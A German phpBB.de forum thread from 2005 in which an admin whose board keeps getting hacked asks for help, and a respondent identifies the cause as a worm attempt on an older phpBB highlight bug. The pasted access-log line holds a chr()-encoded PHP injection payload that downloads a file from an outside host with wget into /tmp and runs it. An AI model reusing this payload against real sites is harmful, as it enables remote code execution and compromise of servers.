phpBB.de

phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/

Wieder mal gehackt!

https://www.phpbb.de/community/viewtopic.php?t=95457

Seite 1 von 1

Wieder mal gehackt!

Verfasst: 16.08.2005 08:02
von maxl
Hallo Freunde!

Langsam bin ich am verzweifeln! :cry: :cry: :cry:

Im letzten halben Jahr wurde mein Account über das Forum bereits zum 4. Mal gehackt! Der Provider sagt, es werde über ein unsicheres Skript Shell-Code ausgeführt.

Leider habe ich aber überhaupt keine Ahnung, wie ich dem Fehler auf die Spur kommen bzw. ihn beseitigen kann. (ich verwende 2.0.17 mit .htaccess für den Adminbereich sowie den CBACK-CRACKER-TRACKER)

In meinen Weblogs ist mir folgendes aufgefallen:
modemcable105.237-80-70.mc.videotron.ca - - [15/Aug/2005:04:33:54 +0200] "GET /phpbb/viewtopic.php?p=1554&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(99)%252echr(111)%252echr(109)%252echr(101)%252echr(99)%252echr(111)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(115)%252echr(105)%252echr(116)%252echr(101)%252echr(46)%252echr(118)%252echr(111)%252echr(105)%252echr(108)%252echr(97)%252echr(46)%252echr(102)%252echr(114)%252echr(47)%252echr(110)%252echr(117)%252echr(120)%252echr(47)%252echr(107)%252echr(97)%252echr(59)%252echr(99)%252echr(104)%252echr(109)%252echr(111)%252echr(100)%252echr(32)%252echr(43)%252echr(120)%252echr(32)%252echr(107)%252echr(97)%252echr(59)%252echr(46)%252echr(47)%252echr(107)%252echr(97)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(102)%252echr(105)%252echr(109))%252e%2527 HTTP/1.0" 302 1431 "-" "Mozilla/4.0
Kann es das sein und wenn ja, was muß ich dagegen tun?

Bitte helft mir, mein Provider hat mir schon nahe gelegt, daß ich die Forensoftware wechseln soll, was ich aber nicht wirklich möchte!

Vielen Dank schon mal!

l.g. maxl

Verfasst: 16.08.2005 10:26
von kellanved
Das sollte nicht die Quelle des Problems sein: das scheint ein Versuch den 2.0.15er Bug zu nutzen zu sein. Auch ist die Downloadadresse für den Wurm bereits abgeschaltet worden(was natürlich auch die Spurensuche erschwert).
Ein richtig geupdatetes 2.0.17 *sollte* sich von diesem Code nicht beeinflussen lassen


In letzter Zeit wurden allerdings viele Probleme mit anderen Softwarepaketen gefunden PHPXMLRPC, AWstats - evtl. ist eines davon "schuldig".
Alle Zeiten sind UTC+01:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de